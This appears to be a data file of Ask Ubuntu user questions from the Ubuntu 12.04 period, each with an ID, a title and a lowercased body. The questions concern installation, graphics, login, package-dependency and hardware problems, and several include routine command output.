130039	lamp server not working on precise	i 've installed ubuntu 12.04 lts precise a few days ago . i tried installing lamp server as i 've been done in last four ubuntu versions , simply by using these commands : sudo apt-get install lamp-server^ sudo apt-get install phpmyadmin first command seems to install all needed packages for lamp to work . it installs and configures apache server , php modules and mysql server , all in one . second one installs phpmyadmin , which i 'll need for mysql database management . but when i open : http : //localhost on my browser , nothing happens . the default page that says `` it works ! '' is n't shown . i tried restarting apache a lot of times with this command : sudo service apache2 restart but no luck . anyone got anything similar ?
130042	ubuntu 12.04 freezes after removing the hdmi cable or changing settings	i 'm using an fresh install of ubuntu 12.04 and i 'm having some problems with hdmi . i usually use it with my tv , but since the update is n't working any more . sometimes in 11.10 i had to execute a script to get the video and sound to work in hdmi , but it was ok . since the update , when i connect the hdmi cable , it works , but if i make any change in the display settings ( like resolution , monitor position , etc , ) it freezes . and if i do n't change anything , it 's working in both monitors , but when i remove the cable , it freezes and even the ctrl+alt+f2 shortcut works . any ideas for fixing this ? i googled and only found many people having problems , usually with sound .
130044	user login cycles	just install 12.04-64bit and while i can login using the guest login , i can not with my user login : it just cycles back to the login screen . i have performed the sequence of apt-get update/upgrade and install of the nvidia-current driver , but got back that it was already in use . the password appears to be recognized , as wrong one results in an error . have also tried switching to the 2d unity , without other results .
130047	low resolution icons in the application switcher	i 'm on precise 12.04 with unity as shell . with simple application switcher enabled in ccsm , all icons are showing in low resolution . is there a way to fix this ?
130049	12.04 speaker static	since upgrading to 12.04 , i 've been having issues with my speakers : they seem to be making an odd hissing noise ( sort of like static ) and they sound really tinny . is anyone else having these problems or is it just me and is there any way to fix it ? ( bear in mind that this is a new problem that i 've never had until i upgraded yesterday )
130052	ubuntu 12.04 does not recognize kingston dt108 16gb usb drive	i bought a kingston dt108 16gb usb pen drive and ubuntu did not recognize it . what should i do ? output of dmesg | tail after connecting pen drive : [ 1455.253010 ] cpu5 : package power limit notification ( total events = 488 ) [ 1455.253013 ] cpu1 : package power limit notification ( total events = 489 ) [ 1455.263966 ] cpu4 : package power limit normal [ 1455.263969 ] cpu2 : package power limit normal [ 1455.263972 ] cpu0 : package power limit normal [ 1455.263975 ] cpu6 : package power limit normal [ 1455.263998 ] cpu1 : package power limit normal [ 1455.264001 ] cpu5 : package power limit normal [ 1455.264004 ] cpu7 : package power limit normal [ 1455.264007 ] cpu3 : package power limit normal
130056	dependency resolution problem : libgnome-keyring0	i 'm trying to install ia32-libs on precise ( it 's a dependency of crossoverpro which is actually what i 'm trying to achieve , but i do n't think that 's relevant ) . that package wo n't install , and tracing through the chain of reported unmet dependencies , i get to libgnome-keyring0 , which wo n't install because of two unmet dependencies , both of which appear to be installed . which leaves me not knowing how to proceed . here 's a log of the steps i went through : [ ~ ] ian @ ian-desktop $ sudo apt-get clean [ ~ ] ian @ ian-desktop $ sudo apt-get autoclean reading package lists ... done building dependency tree reading state information ... done [ ~ ] ian @ ian-desktop $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . [ ~ ] ian @ ian-desktop $ sudo apt-get update ign http : //extras.ubuntu.com precise inrelease hit http : //extras.ubuntu.com precise release.gpg ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //archive.ubuntu.com precise-backports inrelease hit http : //extras.ubuntu.com precise release ign http : //archive.ubuntu.com precise-security inrelease get:1 http : //archive.ubuntu.com precise release.gpg [ 198 b ] get:2 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //extras.ubuntu.com precise/main sources get:3 http : //archive.ubuntu.com precise-backports release.gpg [ 198 b ] hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //extras.ubuntu.com precise/main i386 packages get:4 http : //archive.ubuntu.com precise-security release.gpg [ 198 b ] get:5 http : //archive.ubuntu.com precise release [ 49.6 kb ] ign http : //extras.ubuntu.com precise/main translationindex get:6 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] get:7 http : //archive.ubuntu.com precise-backports release [ 49.6 kb ] get:8 http : //archive.ubuntu.com precise-security release [ 49.6 kb ] get:9 http : //archive.ubuntu.com precise/main sources [ 934 kb ] ign http : //extras.ubuntu.com precise/main translation-en_gb ign http : //extras.ubuntu.com precise/main translation-en get:10 http : //archive.ubuntu.com precise/restricted sources [ 5,470 b ] get:11 http : //archive.ubuntu.com precise/universe sources [ 5,019 kb ] get:12 http : //archive.ubuntu.com precise/multiverse sources [ 155 kb ] get:13 http : //archive.ubuntu.com precise/main amd64 packages [ 1,273 kb ] get:14 http : //archive.ubuntu.com precise/restricted amd64 packages [ 8,452 b ] get:15 http : //archive.ubuntu.com precise/universe amd64 packages [ 4,786 kb ] get:16 http : //archive.ubuntu.com precise/multiverse amd64 packages [ 119 kb ] get:17 http : //archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] get:18 http : //archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:19 http : //archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] get:20 http : //archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex get:21 http : //archive.ubuntu.com precise-updates/main sources [ 11.8 kb ] get:22 http : //archive.ubuntu.com precise-updates/restricted sources [ 765 b ] get:23 http : //archive.ubuntu.com precise-updates/universe sources [ 4,206 b ] get:24 http : //archive.ubuntu.com precise-updates/multiverse sources [ 14 b ] get:25 http : //archive.ubuntu.com precise-updates/main amd64 packages [ 35.7 kb ] get:26 http : //archive.ubuntu.com precise-updates/restricted amd64 packages [ 757 b ] get:27 http : //archive.ubuntu.com precise-updates/universe amd64 packages [ 11.5 kb ] get:28 http : //archive.ubuntu.com precise-updates/multiverse amd64 packages [ 14 b ] get:29 http : //archive.ubuntu.com precise-updates/main i386 packages [ 37.0 kb ] get:30 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 770 b ] get:31 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 11.5 kb ] get:32 http : //archive.ubuntu.com precise-updates/multiverse i386 packages [ 14 b ] hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex get:33 http : //archive.ubuntu.com precise-backports/main sources [ 700 b ] get:34 http : //archive.ubuntu.com precise-backports/restricted sources [ 14 b ] get:35 http : //archive.ubuntu.com precise-backports/universe sources [ 14 b ] get:36 http : //archive.ubuntu.com precise-backports/multiverse sources [ 14 b ] get:37 http : //archive.ubuntu.com precise-backports/main amd64 packages [ 559 b ] get:38 http : //archive.ubuntu.com precise-backports/restricted amd64 packages [ 14 b ] get:39 http : //archive.ubuntu.com precise-backports/universe amd64 packages [ 14 b ] get:40 http : //archive.ubuntu.com precise-backports/multiverse amd64 packages [ 14 b ] get:41 http : //archive.ubuntu.com precise-backports/main i386 packages [ 559 b ] get:42 http : //archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:43 http : //archive.ubuntu.com precise-backports/universe i386 packages [ 14 b ] get:44 http : //archive.ubuntu.com precise-backports/multiverse i386 packages [ 14 b ] hit http : //archive.ubuntu.com precise-backports/main translationindex hit http : //archive.ubuntu.com precise-backports/multiverse translationindex hit http : //archive.ubuntu.com precise-backports/restricted translationindex hit http : //archive.ubuntu.com precise-backports/universe translationindex get:45 http : //archive.ubuntu.com precise-security/main sources [ 3,873 b ] get:46 http : //archive.ubuntu.com precise-security/restricted sources [ 14 b ] get:47 http : //archive.ubuntu.com precise-security/universe sources [ 2,143 b ] get:48 http : //archive.ubuntu.com precise-security/multiverse sources [ 14 b ] get:49 http : //archive.ubuntu.com precise-security/main amd64 packages [ 17.9 kb ] get:50 http : //archive.ubuntu.com precise-security/restricted amd64 packages [ 14 b ] get:51 http : //archive.ubuntu.com precise-security/universe amd64 packages [ 3,186 b ] get:52 http : //archive.ubuntu.com precise-security/multiverse amd64 packages [ 14 b ] get:53 http : //archive.ubuntu.com precise-security/main i386 packages [ 17.9 kb ] get:54 http : //archive.ubuntu.com precise-security/restricted i386 packages [ 14 b ] get:55 http : //archive.ubuntu.com precise-security/universe i386 packages [ 3,190 b ] get:56 http : //archive.ubuntu.com precise-security/multiverse i386 packages [ 14 b ] get:57 http : //archive.ubuntu.com precise-security/main translationindex [ 72 b ] get:58 http : //archive.ubuntu.com precise-security/multiverse translationindex [ 70 b ] get:59 http : //archive.ubuntu.com precise-security/restricted translationindex [ 70 b ] get:60 http : //archive.ubuntu.com precise-security/universe translationindex [ 72 b ] hit http : //archive.ubuntu.com precise/main translation-en_gb hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en_gb hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en_gb hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en_gb hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-en hit http : //archive.ubuntu.com precise-backports/main translation-en hit http : //archive.ubuntu.com precise-backports/multiverse translation-en hit http : //archive.ubuntu.com precise-backports/restricted translation-en hit http : //archive.ubuntu.com precise-backports/universe translation-en get:61 http : //archive.ubuntu.com precise-security/main translation-en [ 7,050 b ] hit http : //archive.ubuntu.com precise-security/multiverse translation-en hit http : //archive.ubuntu.com precise-security/restricted translation-en hit http : //archive.ubuntu.com precise-security/universe translation-en fetched 18.9 mb in 13s ( 1,386 kb/s ) reading package lists ... done [ ~ ] ian @ ian-desktop $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . [ ~ ] ian @ ian-desktop $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . ia32-libs : depends : ia32-libs-multiarch e : unable to correct problems , you have held broken packages . [ ~ ] ian @ ian-desktop $ sudo apt-get install ia32-libs-multiarch reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . ia32-libs-multiarch : i386 : depends : gstreamer0.10-plugins-good : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . [ ~ ] ian @ ian-desktop $ sudo apt-get install gstreamer0.10-plugins-good : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . gstreamer0.10-plugins-good : i386 : depends : libsoup-gnome2.4-1 : i386 ( > = 2.27.4 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . [ ~ ] ian @ ian-desktop $ sudo apt-get install libsoup-gnome2.4-1 : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . libsoup-gnome2.4-1 : i386 : depends : libgnome-keyring0 : i386 ( > = 2.20.3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . [ ~ ] ian @ ian-desktop $ sudo apt-get install libgnome-keyring0 : i386 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . libgnome-keyring0 : i386 : depends : libgnome-keyring-common : i386 ( = 3.2.2-2 ) libpurple0 : depends : libfarstream-0.1-0 ( > = 0.1.1 ) but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . [ ~ ] ian @ ian-desktop $ sudo apt-get install libgnome-keyring-common : i386 libfarstream-0.1-0 reading package lists ... done building dependency tree reading state information ... done note , selecting 'libgnome-keyring-common ' instead of 'libgnome-keyring-common : i386' libfarstream-0.1-0 is already the newest version . libgnome-keyring-common is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . [ ~ ] ian @ ian-desktop $ parenthetically , i have no idea why libpurple0 shows up in the last-but-one step . so there 's clearly something amiss in my package structure , but i 'm not sure how to go about debugging it or resolving the root cause .
130064	lightdm allows only russian keyboard layout at login	i upgraded to 12.04 and now i ca n't log in because ubuntu only allows russian keyboard layout at login , but my password has latin letters in it . guest session works , and allows other languages , but i ca n't log in on my main account . what to do ? on ubuntu 11.10 i used to have swedish as default language and russian as secondary . the first login on 12.04 worked fine , but not any more .
130066	what ide for developing basic applications accessing mysql database ?	i am a noob and want to develop fairly basic web applications accessing mysql database . any suggestions on what ide to develop these applications that i can then host on a webserver provided by my webhost ? by the way , my webhost runs a 'linux ' server with perl , python , etc . there is no support for asp.net , etc .
130069	wired connection problem on a lenovo workstation e20	after upgrading to 12.04 my interent connection no longer works . more precisely it is really , really , slow , and occasionally will connect , but do so only for a few moments and then disappear again . i am on a lenovo workstation e20 . output of ifconfig : eth0 link encap : ethernet hwaddr 70 : f3:95:00:64:3e inet addr:192.168.1.20 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :72f3:95ff : fe00:643e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7398 errors:0 dropped:74 overruns:0 frame:0 tx packets:6684 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5407828 ( 5.4 mb ) tx bytes:854343 ( 854.3 kb ) interrupt:20 memory : fb120000-fb140000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1587 errors:0 dropped:0 overruns:0 frame:0 tx packets:1587 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:152089 ( 152.0 kb ) tx bytes:152089 ( 152.0 kb ) i am really at a loss for what to do . i am relatively new to ubuntu , searched the other user questions and could n't figure this out .
130071	intel atom getting too hot	i own an asus 1215n which is getting very hot intel atom 525d dual core ion 2 ( geforce 220 + gma 3150 ) 4 gb ram ubuntu 12.04 it hits 86 c at idle . some times ( at load or turned on > 1 hour ) it shuts down due to heat , in windows 7 it runs idle at 49 c. i tried an acpi call to shut down the nvidia chip which is cooled together with the atom chip . that did n't solve the problem . to check up to see if it really turned off i checked how much power the laptop consumed , it only went from using 1400 mw to 860 mw , no changes in heat . i also tried reapply the standard heat adhesive , the old heat adhesive made it run at 97 ( it could n't even put up a useful install of ubuntu ) . this really annoys me , as ubuntu is the os of choice to me . should i try compile the kernel ? is it true that compile for a p4 is the better choice to the atom , when compiling the kernel for this processor architecture ? now i tried compiling the kernel for atom . now temperature is 83 c ( think the drop has more to do with ambient temp than the customized kernel ) help appreciated
130087	can not install mysql-server ( 5.5.22 ) on clean ubuntu 12.04 lts server	i have a clean minimal install of ubuntu 12.04 lts server 64-bit ( just a root user and nothing alse installed ) . i tried to install the mysql-server with the following command : apt-get install mysql-server the installation aborts with the following error : the following new packages will be installed : libdbd-mysql-perl { a } libmysqlclient18 { a } mysql-client mysql-client-5.5 { a } mysql-client-core-5.5 { a } mysql-common { a } mysql-server mysql-server-5.5 { a } mysql-server-core-5.5 { a } 0 packages upgraded , 9 newly installed , 0 to remove and 0 not upgraded . need to get 11.7 kb/26.2 mb of archives . after unpacking 94.5 mb will be used . do you want to continue ? [ y/n/ ? ] y get : 1 http : //mirror.eu.oneandone.net/ubuntu/ubuntu/ precise/main mysql-client all 5.5.22-0ubuntu1 [ 11.7 kb ] fetched 11.7 kb in 0s ( 567 kb/s ) preconfiguring packages ... selecting previously unselected package mysql-common . ( reading database ... 54008 files and directories currently installed . ) unpacking mysql-common ( from ... /mysql-common_5.5.22-0ubuntu1_all.deb ) ... selecting previously unselected package libmysqlclient18 . unpacking libmysqlclient18 ( from ... /libmysqlclient18_5.5.22-0ubuntu1_amd64.deb ) ... selecting previously unselected package libdbd-mysql-perl . unpacking libdbd-mysql-perl ( from ... /libdbd-mysql-perl_4.020-1build2_amd64.deb ) ... selecting previously unselected package mysql-client-core-5.5 . unpacking mysql-client-core-5.5 ( from ... /mysql-client-core-5.5_5.5.22-0ubuntu1_amd64.deb ) ... selecting previously unselected package mysql-client-5.5 . unpacking mysql-client-5.5 ( from ... /mysql-client-5.5_5.5.22-0ubuntu1_amd64.deb ) ... selecting previously unselected package mysql-server-core-5.5 . unpacking mysql-server-core-5.5 ( from ... /mysql-server-core-5.5_5.5.22-0ubuntu1_amd64.deb ) ... processing triggers for man-db ... setting up mysql-common ( 5.5.22-0ubuntu1 ) ... selecting previously unselected package mysql-server-5.5 . ( reading database ... 54189 files and directories currently installed . ) unpacking mysql-server-5.5 ( from ... /mysql-server-5.5_5.5.22-0ubuntu1_amd64.deb ) ... selecting previously unselected package mysql-client . unpacking mysql-client ( from ... /mysql-client_5.5.22-0ubuntu1_all.deb ) ... selecting previously unselected package mysql-server . unpacking mysql-server ( from ... /mysql-server_5.5.22-0ubuntu1_all.deb ) ... processing triggers for ureadahead ... processing triggers for man-db ... setting up libmysqlclient18 ( 5.5.22-0ubuntu1 ) ... setting up libdbd-mysql-perl ( 4.020-1build2 ) ... setting up mysql-client-core-5.5 ( 5.5.22-0ubuntu1 ) ... setting up mysql-client-5.5 ( 5.5.22-0ubuntu1 ) ... setting up mysql-server-core-5.5 ( 5.5.22-0ubuntu1 ) ... setting up mysql-server-5.5 ( 5.5.22-0ubuntu1 ) ... 120502 10:17:41 [ note ] plugin 'federated ' is disabled . 120502 10:17:41 innodb : the innodb memory heap is disabled 120502 10:17:41 innodb : mutexes and rw_locks use gcc atomic builtins 120502 10:17:41 innodb : compressed tables use zlib 1.2.3.4 120502 10:17:41 innodb : initializing buffer pool , size = 128.0m 120502 10:17:41 innodb : completed initialization of buffer pool 120502 10:17:41 innodb : highest supported file format is barracuda . 120502 10:17:41 innodb : waiting for the background threads to start 120502 10:17:42 innodb : 1.1.8 started ; log sequence number 1595675 120502 10:17:42 innodb : starting shutdown ... 120502 10:17:42 innodb : shutdown completed ; log sequence number 1595675 start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already setting up mysql-client ( 5.5.22-0ubuntu1 ) ... dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up mysql-server-5.5 ( 5.5.22-0ubuntu1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : mysql-server-5.5 mysql-server i am completely lost because i have tried everything on the web to solve my problem ( clearning the install , reconfiguring with dpkg , manually editing the my.cnf ) . i also set up a new clean install but nothing helped . what am i doing wrong ? new information : the file /var/log/upstart/mysql.log contains the following error after the installation : apparmor parser error for /etc/apparmor.d/usr.sbin.mysqld in /etc/apparmor.d/tunables/global at line 17 : could not open 'tunables/proc'
130088	overscan slider disabled in nvidia-settings after 10.04 lts - 12.04 lts upgrade	i 've googled this to death but ca n't find any useful answers . i have a panny lcd tv which ubuntu/unity/compiz has detected as a laptop display and i 'm thinking that 's part of the problem . everything was working perfectly under 10.04 lts . i should have been patient and waited a couple of months to upgrade . any help at all will be greatly appreciated .
130092	what does ubuntu mean by `` support '' for its releases ?	whenever ubuntu releases a new version during six months , they offer support for that version for the coming six months right ? what does that support mean ? does it mean that i can not use apt-get to install any more softwares in it once that six months is over ? if that is the case , then is my ubuntu 10.04 of no use to me in installing applications and softwares anymore ? if that is not what it means , then what exactly does a 5 year support for an lts mean ?
130097	cuda support in 12.04	i do not want to switch between cards . install cuda card ( gt 420 48 cores ) , and the motherboard disables the ati video on the desktop computer , so cuda is the exclusive driver of the display . there will not be need for multiple monitors . will it be recognized and can it be configured to match my monitor ( 1600x900 ) ? do i need to locate drivers , if so where ? can applications like boinc access the gpu functions of the cuda card ?
130098	graphics issue after upgrading from 11.10 to 12.04	this is a weird one , i think . the hardware : fujitsu siemens amilo 3530 , 4gb ram , 2x500gb hdd , ati radeon 3650 so , i upgraded from 11.10 to 12.04 from the update mangler . everything went swimmingly and it took about 90 mins to install . then , following reboot , it tells me that it ca n't determine my graphics settings and is running in low res mode . then it gives me 4 options : run in low graphics mode for one session reconfigure graphics troubleshoot the error exit to console login . whichever i choose it just shows me the terminal and asks for login , which i do , then it just leaves a blinking cursor . i have no idea what the hell it is expecting me to do . what am i supposed to do ? 11.10 installed and just worked , which made me quite happy about my decision to ditch windows . however , now , i find i have a laptop that i can not use at all and ubuntu is giving me no pointers at all . not a happy bunny . if anyone can help me , i would really appreciate it as i need my laptop back asap and do n't want to have to go an buy a copy of windows !
130108	what if i upgrade xubuntu ? wo n't it turn into ubuntu ?	my xubuntu 11.10 offers me to upgrade to ubuntu 12.04 . but i do n't want ubuntu , i want xubuntu !
130110	tightvncserver on ubuntu 12.04 server with ubuntu-desktop installed no unity	the tight vnc server is running but unity does not get loaded . i changed the xstartup to : unset session_manager . /etc/x11/xinit/xinitrc [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources gnome-session & but still no unity . in wich log file can i look for the errors containing the starting of tightvncserver in combination with gnome and unity ? can somone point me at documentation abou tthe loading/starting sequence of xserver , windows manager etc. ? is this a known issue ?
130112	should i ever worry about router compatibility ?	assume i 'm getting a new router . i 've never heard of any problems like this , but is there reason to fear some routers might not work well with ubuntu ? if so , which types ?
130115	can i rename liferea feeds imported from google ?	i sync liferea with google reader in order to only have to maintain my ( lengthy ) list of feeds in one place . many of the feeds have annoyingly long names which i have renamed in google reader to be much shorter . however , it looks like liferea is not using the new name from google reader , but rather the name of the feed itself . any way to fix this or rename them in liferea ?
130116	severe graphics and application problems after update	i wanted to upgrade from 11.10 to 12.04 with the built-in upgrade-feature . but during the upgrade my pc stopped working . when i restarted my pc ubuntu starts ok , but with many errors ( many apps do n't work and some graphic-errors ) . i try to upgrade again to 12.04 , but i ca n't , because my ubuntu identifies itself as 12.04 . i tried to upgrade with the cd-setup but this also does n't work . what should i do , if i do n't want to reinstall the whole system ?
130118	vboxmanage modifyhd -- resize does n't exist ?	i 'm trying to increase the size of a virtualbox win7 .vdi disk on ubuntu 10.04 but when i try executing vboxmanage modifyhd /path/disk.vdi -- resize 15360 it returns syntax error : unknown option : -- resize . i 'm unsure as to why this is happening because i 've used it before and it 's still listed under valid options for vboxmanage modifyhd in the virualbox user manual . cheers , george @ maniat1k george @ george-laptop : ~ $ vboxmanage modifyhd '/home/george/.virtualbox/harddisks/windows 7 64bit.vdi ' -- resize 15360 sun virtualbox command line management interface version 3.1.6_ose ( c ) 2005-2010 sun microsystems , inc. all rights reserved . usage : vboxmanage modifyhd | [ -- type normal|writethrough|immutable ] [ -- autoreset on|off ] [ -- compact ] syntax error : unknown option : -- resize
130120	usb plugin webcam with skype 2.2 beta	i have a pretty generic usb webcam ( it is a generic sphere shaped webcam i got from ibm , it says ibm on it ) that i want to work with skype . in past installations of ubuntu , i could get this webcam working with skype by using this command ( or something very similar to it ) ld_preload=/usr/lib/libv4l/v4l1compat.so skype i have a fresh installation of ubuntu 12.04 , and i just installed skype for linux beta 2.2 through the apt software center . needless to say when i plug in the web cam and use skype , i can not get video working . i already have this web cam working with gmail video chat . when i execute the above line of code to start skype , i get this output : error : ld.so : object '/usr/lib/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . and then skype starts up and works like normal , but when i try to test or use the web cam nothing happens , no error but no video . in the skype options : video devices tab , it says that it finds a pc camera at /dev/video0 . when i click `` test '' i still just get a black screen and no light on the web cam . 2 questions : how do i use ubuntu to tell the model and driver for the web cam , so i can troubleshoot easier ? does anyone know off the top of their heads how to fix this problem ? thanks a lot !
130124	how can i make notifications appear on a specific monitor ?	in my ubuntu 12.04 , i have two monitors : left is the laptop and the right one is an external and big monitor . my vision is generally focused on the laptop monitor , but the notifications appears in the right one , therefore , i lose the notifications . is possible to change the location of the notifications ? for example , the notifications appear on the top-right corner of the laptop/left monitor .
130127	how to show the alt-tab popup on all monitors ?	by default , it seems that the alt-tab popup for switching between applications shows on whichever monitor contains the active window . is there anyway to duplicate the alt-tab popup on both monitors all at once ? if not , is there a way to force it to always appear on one distinct monitor so it does n't always seem random ?
130128	mp3s synced on ubuntu one not showing up under artist or album	i have synced approximately 10gb of music with u1 over the last 48 hours . nearly everything appears ok : the songs are tagged correctly , i can queue and play them . however , with the exception of a few that i uploaded first , all of them do n't appear under artist or album and i ca n't use the search to find them . i can only find them under song . am i just being impatient and u1 just needs time to index these mp3s , or is something wrong ?
130138	are there ubuntu meetups being held to discuss and fix bugs ?	does the ubuntu community host meetups where people can come together , discuss their doubts and rectify problems with their installations ? if yes , where are these announced ? and if no , is there any specific reason that it is not happening ?
130139	architecture diagram explaining the ubuntu cloud infrastructure with maas / openstack architecture ?	i 'm interested in ubuntu cloud infrastructure with maas ( based on openstack from what i understand ) but can not find any architecture diagram which gives an overview of how maas works . the case is ubuntu cloud infrastructure with maas . it requires at least 10 nodes ( as described in installing ubuntu cloud infrastructure ) and this `` 10 maas nodes architecture '' would typically be a perfect candidate for an architecture diagram ! would n't it be an easy/reality-based way to understand how maas works and what it offers ? looking for docs , i stumbled upon a technical and up-to-date documentation with architecture diagrams ( ! ) : revisiting openstack architecture : essex edition could we imagine that an architecture diagram and/or description could be provided to easily understand how a minimal 10 nodes ubuntu cloud infrastructure with maas installation works ?
130140	unity-greeter not showing personal wallpaper	i did a fresh install of ubuntu 12.04 64bit and for some reason my personal wallpaper is not displayed in the unity-greeter instead the ( what i think is ) default purple wallpaper is shown . i have no idea what could be the problem and the people on the irc where not able to help me either . note : i know the command the set your personal wallpaper in unity-greeter , problem is that i 'm using a wallpaper switcher and i thus want it to also always switch my unity-greeter wallpaper . ( i would be able to write a scipt that would been run every minute to reset the wallpaper but i think there should be an easier fix ) edit : i fixed the problem i 'm using wallch as my wallpaper switcher and stored all my wallpapers in /home/backgrounds/ and i had set all my wallpapers to chmod 775 problem was that i did n't chmod the folder but i chmodded the actual pictures .
130142	can i install safely ubuntu on my mac ?	i have some questions related with ubuntu . i have an imac , with os x lion and windows 7 installed . so , can i install ubuntu alongside mac and windows without any problems ? can i resize my mac 's partition later ? also , my keyboard does n't seems to work ... : / my imac is a late 2009 with 4 gb of ram .
130144	how to map a key to another on my keyboard ?	my space-bar button is not working any more so i want to change the behavior of it to another key to simulate space button press , so how to map space button to the right alt/windows key ? ? ?
130146	nvidia xorg.conf options for better performances in unity 3d	i am on precise , unity works fine but i would like to improve the performances of the system . the dash , for example , is slow and has an high cpu usage . compiz in general uses 3-4 % of cpu , and this is quite annoying for a notebook . what can i do ?
130147	my computer turned off while upgrading to 12.04	now ubuntu wo n't start . it shows the loading screen and then nothing else but a black screen and the cursor . when i move the cursor it 's very laggy like 5 fps . i tried to show the console with ctrl+alt+f1-6 and do-release-upgrade but console does n't appear . i have important data on that machine , so i need to access it . any advice how to safe my installation ?
130151	evince does not work properly	i am using ubuntu 12.04 lts and when i open a pdf or ps file and try to make it bigger by going to the top right corner using the arrow , the system freezes .
130153	directed back to login screen every time after upgrade to 12.04 from 11.10	i have a lenovo thinkpad t410 which used to run nice under 11.10 . yesterday i upgraded to 12.04 and from that point on i can not login . my laptop boots normally and i am presented with the log in screen in which i type my password / or scan my fingerprint and it seems that it is accepted because the screen goes black . after that some output is show for a very brief time and i am again directed back to the log in screen . my password is correct because every time i use a wrong one it does not go to the black screen . i tried removing and reinstalling nvidia current drivers but nothing changes . i am able to enter into guest session but that is not helpful . i tried the fsck option and the dpkg and failsafe graphics in the recovery mode but nothing helped . i tried all the apt-get clean , -f install , purge , autoremove and every other thing i could imagine . if anyone has an idea i am more than welcome to try . thank you
130154	ubuntu 12.04 lts fails to recognize my laptop as laptop	this is probably going to sound like a rookie question , but i have never ever experienced such issue . i had ubuntu 11.10 without unity installed on my old laptop thinkpad z60m . few days ago , i got notification that 12.04 lts is outside and that i should upgrade . as it is my old laptop , with nothing important on , i decided to go for it . all fine and well . except , now , ubuntu behaves like i am not using a laptop . there is no battery indicator and i can not enable it via power settings ( setting does n't get stored ) . also , power consumption is enormous , so it is now hardly usable running only on battery . thing is 11.10 worked fine . also , my battery held up to 3 hours . so , i guess my question is , is there anything i can do to fix this , or do i need a reinstall ?
